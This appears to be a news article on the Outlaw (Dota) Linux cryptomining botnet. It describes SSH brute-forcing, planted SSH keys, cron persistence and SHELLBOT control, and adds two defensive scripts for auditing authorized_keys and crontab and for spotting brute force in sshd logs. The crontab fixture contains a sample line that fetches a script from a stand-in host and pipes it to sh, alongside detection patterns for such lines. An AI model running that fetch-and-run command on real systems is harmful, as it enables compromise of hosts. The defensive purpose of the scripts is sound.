
Cybersecurity researchers are shedding light on the "auto-propagating" cryptocurrency mining botnet known as Outlaw (aka Dota), which is known for targeting poorly secured SSH servers.
"Outlaw is a Linux malware that relies on SSH brute-force attacks, cryptocurrency mining, and worm-like propagation to infect and maintain control over systems," Elastic Security Labs said in a new analysis published Tuesday.
Outlaw is also the name given to the threat actor behind the malware, which is thought to be of Romanian origin. Other hacking groups that dominate the cryptojacking landscape include 8220, Keksec (aka Kek Security), Kinsing, and TeamTNT.
The crew, active since at least late 2018, gains access by brute-forcing SSH servers, then performs reconnaissance and maintains persistence on compromised hosts by adding its own SSH keys to the "authorized_keys" file.
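The two persistence mechanisms described here (an attacker-added entry in authorized_keys and a cron job, which the Elastic report also cites) are straightforward to audit. The following script is an added example, not code from the article or from Elastic Security Labs: it fingerprints every key in an authorized_keys file and reports those not on an allowlist, and it flags crontab lines with traits that legitimate server jobs rarely have (hidden directories, download-and-pipe-to-shell, @reboot, paths under /tmp or /dev/shm). The key blobs, file contents and the allowlist are all constructed for the demo; on a real host the allowlist would come from your key inventory.

```python
"""Audit SSH authorized_keys and crontab content for Outlaw-style persistence.

Added example, not code from the article or from Elastic Security Labs.
All sample file contents and key blobs below are constructed; the
fingerprint allowlist is a hypothetical placeholder for a real inventory.
"""
import base64
import hashlib
import re
import shlex


def fake_key_blob(seed: bytes) -> str:
    """Build a constructed, syntactically valid base64 key blob for the demo."""
    blob = b"\x00\x00\x00\x0bssh-ed25519" + hashlib.sha256(seed).digest()
    return base64.b64encode(blob).decode()


def key_fingerprint(key_b64: str) -> str:
    """OpenSSH-style fingerprint: SHA256 over the decoded blob, base64 without padding."""
    digest = hashlib.sha256(base64.b64decode(key_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text: str):
    """Return (key_type, key_b64, comment) tuples, skipping blank and comment lines."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        try:
            parts = shlex.split(line)  # keeps quoted options like command="..." intact
        except ValueError:
            parts = line.split()
        for i, tok in enumerate(parts):
            if tok.startswith(("ssh-", "ecdsa-", "sk-")):
                key_b64 = parts[i + 1] if i + 1 < len(parts) else ""
                entries.append((tok, key_b64, " ".join(parts[i + 2:])))
                break
    return entries


def find_unexpected_keys(text: str, allowed_fingerprints):
    """Return key entries whose fingerprint is not in the allowlist."""
    return [e for e in parse_authorized_keys(text)
            if key_fingerprint(e[1]) not in allowed_fingerprints]


# Cron traits that are unusual for legitimate jobs on a server.
CRON_CHECKS = [
    ("hidden_dir", re.compile(r"/\.[A-Za-z0-9_-]+/")),
    ("download_exec", re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")),
    ("reboot", re.compile(r"^@reboot\b")),
    ("tmp_path", re.compile(r"/(tmp|var/tmp|dev/shm)/")),
]


def find_suspicious_cron(text: str):
    """Map each suspicious crontab line to the list of check names it triggered."""
    hits = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        reasons = [name for name, rx in CRON_CHECKS if rx.search(line)]
        if reasons:
            hits[line] = reasons
    return hits


# Constructed sample data (not real keys or real attacker artifacts).
GOOD_KEY = fake_key_blob(b"admin workstation")
BACKUP_KEY = fake_key_blob(b"backup host")
ROGUE_KEY = fake_key_blob(b"attacker")
ALLOWED = {key_fingerprint(GOOD_KEY), key_fingerprint(BACKUP_KEY)}

SAMPLE_AUTHORIZED_KEYS = f"""# constructed sample
ssh-ed25519 {GOOD_KEY} admin@workstation
no-pty,command="/usr/bin/rsync --server" ssh-ed25519 {BACKUP_KEY} backup
ssh-ed25519 {ROGUE_KEY} unknown
"""

SAMPLE_CRONTAB = """# constructed sample
0 3 * * * /usr/local/bin/backup.sh
@reboot /home/user/.hidden/run.sh
*/5 * * * * curl -s http://example.invalid/x.sh | sh
"""

if __name__ == "__main__":
    for key_type, _, comment in find_unexpected_keys(SAMPLE_AUTHORIZED_KEYS, ALLOWED):
        print(f"unexpected key: {key_type} {comment!r}")
    for line, reasons in find_suspicious_cron(SAMPLE_CRONTAB).items():
        print(f"suspicious cron: {line!r} -> {reasons}")
```

Fingerprinting rather than string-comparing the key line means a re-ordered or re-commented entry still matches the inventory, and an attacker's key is flagged even if it reuses a familiar comment. To run this against a real host, read `~/.ssh/authorized_keys` for every user and the output of `crontab -l` plus the files under `/etc/cron.d`, and feed the text to the two `find_*` functions.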

The attackers are also known to use a multi-stage infection process in which a dropper shell script ("tddwrt7s.sh") downloads an archive file ("dota3.tar.gz").
A notable feature of the malware is its initial access component (aka BLITZ), which lets it self-propagate in a botnet-like manner by scanning for vulnerable systems running an SSH service. The brute-force module is configured to retrieve its target list from an SSH command-and-control (C2) server, so that the infection cycle continues.
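From the defender's side, the brute-force stage shows up in sshd logs as a burst of failed password attempts from one source, often across several usernames, sometimes followed by an accepted login. The following script is an added example, not code from the article or Elastic Security Labs: it summarises failed password attempts per source IP over a set of log lines and records any login that succeeded after the failure count crossed a threshold. The log lines are constructed in the standard OpenSSH syslog format, and the threshold of five is an arbitrary illustrative value.

```python
"""Spot SSH brute-force activity in sshd log lines.

Added example, not code from the article or Elastic Security Labs. The log
lines below are constructed; the default threshold is an illustrative value.
"""
import re
from collections import defaultdict

FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\d{1,3}(?:\.\d{1,3}){3})")
ACCEPTED_RE = re.compile(
    r"sshd\[\d+\]: Accepted (\w+) for (\S+) from (\d{1,3}(?:\.\d{1,3}){3})")


def analyze_auth_log(lines, threshold=5):
    """Return per-IP summaries for sources with at least `threshold` failed passwords.

    Lines are processed in order, so a success is only recorded under
    'succeeded_after' if enough failures from the same source preceded it,
    which is the signature of a brute force that eventually worked.
    """
    failed_users = defaultdict(list)     # ip -> usernames tried
    succeeded_after = defaultdict(list)  # ip -> (auth method, user) after the burst
    for line in lines:
        m = FAILED_RE.search(line)
        if m:
            failed_users[m.group(2)].append(m.group(1))
            continue
        m = ACCEPTED_RE.search(line)
        if m and len(failed_users.get(m.group(3), [])) >= threshold:
            succeeded_after[m.group(3)].append((m.group(1), m.group(2)))
    report = {}
    for ip, users in failed_users.items():
        if len(users) >= threshold:
            report[ip] = {
                "failures": len(users),
                "distinct_users": len(set(users)),
                "succeeded_after": succeeded_after.get(ip, []),
            }
    return report


# Constructed sample log: one source hammering several accounts and finally
# getting in with a password, and one user who mistypes once then logs in with a key.
SAMPLE_LOG = """\
Apr  1 10:00:01 web1 sshd[2101]: Failed password for invalid user admin from 203.0.113.5 port 40210 ssh2
Apr  1 10:00:02 web1 sshd[2103]: Failed password for invalid user oracle from 203.0.113.5 port 40214 ssh2
Apr  1 10:00:03 web1 sshd[2105]: Failed password for root from 203.0.113.5 port 40218 ssh2
Apr  1 10:00:04 web1 sshd[2107]: Failed password for root from 203.0.113.5 port 40222 ssh2
Apr  1 10:00:05 web1 sshd[2109]: Failed password for root from 203.0.113.5 port 40226 ssh2
Apr  1 10:00:06 web1 sshd[2111]: Failed password for root from 203.0.113.5 port 40230 ssh2
Apr  1 10:00:07 web1 sshd[2113]: Accepted password for root from 203.0.113.5 port 40234 ssh2
Apr  1 10:01:00 web1 sshd[2120]: Failed password for alice from 198.51.100.7 port 51000 ssh2
Apr  1 10:01:05 web1 sshd[2122]: Accepted publickey for alice from 198.51.100.7 port 51004 ssh2
""".splitlines()

if __name__ == "__main__":
    for ip, summary in analyze_auth_log(SAMPLE_LOG).items():
        print(ip, summary)
```

A source that appears in the report with a non-empty `succeeded_after` list is the case worth acting on first: the account it landed on should have its authorized_keys and crontab checked immediately, since that is where the persistence described above is planted. Feeding `/var/log/auth.log` (or `journalctl -u ssh` output) line by line into `analyze_auth_log` is enough to run this on a real host.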

Several iterations of the attacks have also exploited Linux and UNIX-based operating systems susceptible to CVE-2016-8655 and CVE-2016-5195 (aka Dirty COW). Once initial access is obtained, the malware uses an IRC channel to deploy SHELLBOT for remote control via the C2 server.

SHELLBOT lets the operator execute arbitrary shell commands, download and run additional payloads, launch DDoS attacks, steal credentials, and exfiltrate sensitive information.
As part of the mining process, the malware identifies the CPU of the infected system and enables hugepages for all CPU cores to improve memory access efficiency. It also uses a binary called kswap01 to ensure persistent communication with the threat actor's infrastructure.
"Despite employing basic techniques like SSH brute-forcing, SSH key manipulation, and cron-based persistence, Outlaw remains active," Elastic said. "The malware deploys modified XMRig miners, leverages IRC for C2, and includes publicly available scripts for persistence and defense evasion."